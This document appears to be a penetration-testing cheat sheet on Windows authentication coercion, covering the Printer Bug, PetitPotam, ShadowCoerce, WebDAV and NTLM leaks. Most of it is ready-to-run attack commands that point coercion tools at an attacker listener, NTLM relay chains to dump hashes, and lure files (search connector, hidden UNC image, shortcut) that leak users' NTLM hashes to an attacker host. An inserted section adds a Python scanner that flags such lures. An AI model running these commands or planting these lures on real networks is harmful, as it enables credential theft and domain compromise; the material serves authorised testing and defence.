# Authentication Coercion

* <https://github.com/p0dalirius/windows-coerced-authentication-methods>
* <https://habr.com/ru/post/688682/>

{% hint style="info" %}
It's a good idea to check if **NTLMv1 downgrade** is possible when triggering the callbacks.
{% endhint %}

{% content-ref url="/pages/-MftDqGp10hjGBrtmaEF" %}
[NTLMv1 Downgrade](/pentest/infrastructure/ad/ntlm/ntlmv1-downgrade.md)
{% endcontent-ref %}

## Printer Bug (MS-RPRN)

{% embed url="https://twitter.com/DebugPrivilege/status/1410158556540719104" %}

Check if the Spooler service is running (via Remote Registry, or by listing the RPC interfaces the host exposes):

```
$ rpcdump.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11 | grep -A2 -e MS-RPRN -e MS-PAR
```

### SpoolSample

* <https://github.com/leechristensen/SpoolSample>
* <https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Spoolsample.ps1>
* <https://github.com/0x00ach/stuff/blob/master/MS-RPRN.exe>
* <https://github.com/BeetleChunks/SpoolSploit>

```
Cmd > .\SpoolSample.exe 192.168.1.11 10.10.13.37
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@80/test.txt
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@SSL/test.txt
```

### dementor.py

* <https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc>

```
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@80/test.txt DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@SSL/test.txt DC01.megacorp.local
```

### printerbug.py

* <https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py>

```
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 10.10.13.37
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@80/test.txt
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@SSL/test.txt
```

## PetitPotam (MS-EFSR)

**CVE-2021-36942**

* <https://github.com/topotam/PetitPotam>
* <https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-Petitpotam.ps1>
* <https://gist.github.com/leechristensen/fda130890fb3c194115e7b856640c30e>
* <https://github.com/ly4k/PetitPotam>

```
$ python3 PetitPotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11 [-pipe all]
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@80/test.txt 192.168.1.11
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@SSL/test.txt 192.168.1.11
Cmd > .\PetitPotam.exe 10.10.13.37 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@80/test.txt 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@SSL/test.txt 192.168.1.11 1
```

Coerce any host with PetitPotam (not only a DC that allows null sessions on the `IPC$` share) without initial credentials, by proxying through an authenticated session obtained on behalf of a relayed DC machine account:

```
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
Something went wrong, check error status => SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

$ ntlmrelayx.py -ip 10.10.13.37 -t 192.168.1.11 -smb2support -socks --no-http-server --no-wcf-server --no-raw-server

$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 DC1.megacorp.local
ntlmrelayx> socks
ntlmrelayx> stopservers

$ sudo ./Responder.py -I eth0 -vA
$ proxychains4 python3 Petitpotam.py -d MEGACORP -u 'DC1$' -no-pass 10.10.13.37 192.168.1.11
```

{% hint style="info" %}
NTLM Relay DC1 to EXCH1 to get SOCKS ➡️ SOCKS proxy PetitPotam to EXCH1 as `DC1$` ➡️ NTLM Relay to EXCH2 to dump hashes
{% endhint %}

With Kerberos authentication:

```
$ getTGT.py megacorp.local/snovvcrash -hashes e929e69f7c290222be87968263a9282e:e929e69f7c290222be87968263a9282e -dc-ip 192.168.1.11
$ KRB5CCNAME=`pwd`/snovvcrash.ccache python3 PetitPotam.py -k -no-pass -d megacorp.local -u snovvcrash target.megacorp.local attacker.megacorp.local
```

### Theory

* <https://www.tiraniddo.dev/2021/08/how-windows-firewall-rpc-filter-works.html>
* <https://www.tiraniddo.dev/2021/08/how-to-secure-windows-rpc-server-and.html>
* <https://itm4n.github.io/fuzzing-windows-rpc-rpcview/>
* <https://itm4n.github.io/from-rpcview-to-petitpotam/>
* <https://clearbluejar.github.io/posts/from-ntobjectmanager-to-petitpotam/>

### Mitigation

* <https://kb.cert.org/vuls/id/405600>
* <https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/>
* <https://github.com/zeronetworks/rpcfirewall>

## ShadowCoerce (MS-FSRVP)

* <https://pentestlaboratories.com/2022/01/11/shadowcoerce/>
* <https://github.com/ShutdownRepo/ShadowCoerce>

```
$ python3 shadowcoerce.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 192.168.1.11
```

## EvilentCoerce (MS-EVEN)

* <https://habr.com/ru/companies/tomhunter/articles/907068/>
* <https://github.com/Thunter-HackTeam/EvilentCoerce>

## WebDAV (WebClient)

* <https://pentestlab.blog/2021/10/20/lateral-movement-webclient/>
* <https://www.tiraniddo.dev/2015/03/starting-webclient-service.html>
* <https://github.com/Hackndo/WebclientServiceScanner>

Check if a callback via WebDAV (HTTP) is possible: it **is** when the `WebClient` service is running. If so, [NTLM Relay to LDAPS](https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/kerberos/delegation-abuse/rbcd/README.md#dhcpv6-wpad-ntlm-relay-rbcd) on behalf of the relayed machine account is your chance for [RBCD workstation takeover](https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb).

Check via PowerShell:

```
PS > Install-Module -Name NtObjectManager
PS > Get-NtFile -Win32Path '\\192.168.1.11\pipe\DAV RPC SERVICE'
```

Check via CME:

```
$ cme smb smb.txt -u snovvcrash -p 'Passw0rd!' -M webdav | grep -a 'WebClient Service enabled'
```

Check via [GetWebDAVStatus](https://github.com/G0ldenGunSec/GetWebDAVStatus):

```
PS > .\GetWebDAVStatus.exe SRV01,SRV02 --tc 1
```

### Enable WebClient

* <https://specterops.io/blog/2025/08/19/will-webclient-start/>

Put the `.searchConnector-ms` file on a writable share. When a domain user opens the target folder in Explorer, the WebClient service should start automatically:

{% code title="Documents.searchConnector-ms" %}

```
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
    <description>Microsoft Outlook</description>
    <isSearchOnlyItem>false</isSearchOnlyItem>
    <includeInStartMenuScope>true</includeInStartMenuScope>
    <templateInfo>
        <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
    </templateInfo>
    <simpleLocation>
        <url>https://whatever/</url>
    </simpleLocation>
</searchConnectorDescription>
```

{% endcode %}

## CVE-2022-30216

* <https://www.akamai.com/blog/security/authentication-coercion-windows-server-service>
* <https://github.com/akamai/akamai-security-research/tree/main/cve-2022-30216>

## NTLM Leak

* <https://github.com/xct/hashgrab>
* <https://github.com/Gl3bGl4z/All_NTLM_leak>
* <https://specterops.io/blog/2025/08/22/operating-outside-the-box-ntlm-relaying-low-privilege-http-auth-to-ldap/>

Leak with PowerShell:

```
PS > IWR -UseDefaultCredentials http://10.10.13.37/index.html
```

Leak [with Python](https://stackoverflow.com/a/35577331):

```python
import win32com.client

URL = 'http://10.10.13.37/index.html'

# WinHTTP request object; AutoLogonPolicy 0 (AutoLogonPolicy_Always) makes it
# answer an NTLM challenge from any host with the current user's credentials
COM_OBJ = win32com.client.Dispatch('WinHTTP.WinHTTPRequest.5.1')
COM_OBJ.SetAutoLogonPolicy(0)
COM_OBJ.Open('GET', URL, False)
COM_OBJ.Send()
print(COM_OBJ.ResponseText)
```

Leak with rpcping (catch with Responder's DCE-RPC listener):

```
Cmd > rpcping -s 10.10.13.37 -e 135 -a privacy -u NTLM
```

Leak with a hidden image:

```html
<img src="\\10.10.13.37\pwn.ico" height="1" width="1" />
```
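As an added defender-side example (not from the original page or any of the tools it lists), the following Python scanner walks a file share and flags the two lure files shown above: a `.searchConnector-ms` whose `simpleLocation/url` points to a host outside an assumed allowlist of internal hosts, and HTML whose `src` attributes reference UNC paths. The allowlist and the embedded sample inputs are constructed for this example.

```python
import os
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Hostnames a search connector is expected to point at (assumed allowlist for this example)
ALLOWED_HOSTS = {"intranet.megacorp.local"}
NS = {"sc": "http://schemas.microsoft.com/windows/2009/searchConnector"}
# src attributes whose value is a UNC path (\\host\share\file)
UNC_SRC = re.compile(r'''src\s*=\s*["'](\\\\[^"']+)["']''', re.IGNORECASE)
# Constructed samples mirroring the lure files shown on this page
SAMPLE_CONNECTOR = """<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
    <simpleLocation><url>https://whatever/</url></simpleLocation>
</searchConnectorDescription>"""
SAMPLE_HTML = '<html><body><img src="\\\\10.10.13.37\\pwn.ico" height="1" width="1" /></body></html>'

def connector_url(xml_text):
    """Return the <simpleLocation><url> of a .searchConnector-ms document, or None."""
    node = ET.fromstring(xml_text).find("sc:simpleLocation/sc:url", NS)
    return node.text.strip() if node is not None and node.text else None

def is_suspicious_url(url):
    """A connector URL is suspicious when its host is missing or not on the allowlist."""
    host = urlparse(url).hostname
    return host is None or host.lower() not in ALLOWED_HOSTS

def unc_image_sources(html_text):
    """Return every src attribute value in the HTML that references a UNC path."""
    return UNC_SRC.findall(html_text)

def scan_tree(root_dir):
    """Walk a share and report lure files as (path, reason) tuples."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            path, low = os.path.join(dirpath, name), name.lower()
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if low.endswith(".searchconnector-ms"):
                url = connector_url(data)
                if url and is_suspicious_url(url):
                    findings.append((path, "search connector points to " + url))
            elif low.endswith((".html", ".htm")):
                findings += [(path, "UNC resource " + s) for s in unc_image_sources(data)]
    return findings
```

Run `scan_tree` against a mounted copy of the share; each finding names the file and the external host or UNC path it would make Explorer or a browser reach out to.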

Leak with a shortcut:

{% code title="lnk.ps1" %}

```powershell
$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("\\SRV01\PublicShare\pwn.lnk")
$lnk.IconLocation = "\\10.10.13.37\pwn.ico"
$lnk.Save()
```

{% endcode %}

Leak with curl:

```
Cmd > curl.exe -i --ntlm -u : http://10.10.13.37/index.html
```

## Tools

### Coercer

* <https://github.com/p0dalirius/Coercer>

```
$ coercer coerce -u snovvcrash -p 'Passw0rd!' -f dc.txt -l 10.10.13.37 [--filter-pipe-name efsrpc] [--filter-method-name EfsRpcDuplicateEncryptionInfoFile] --auth-type smb --always-continue --delay 1
```
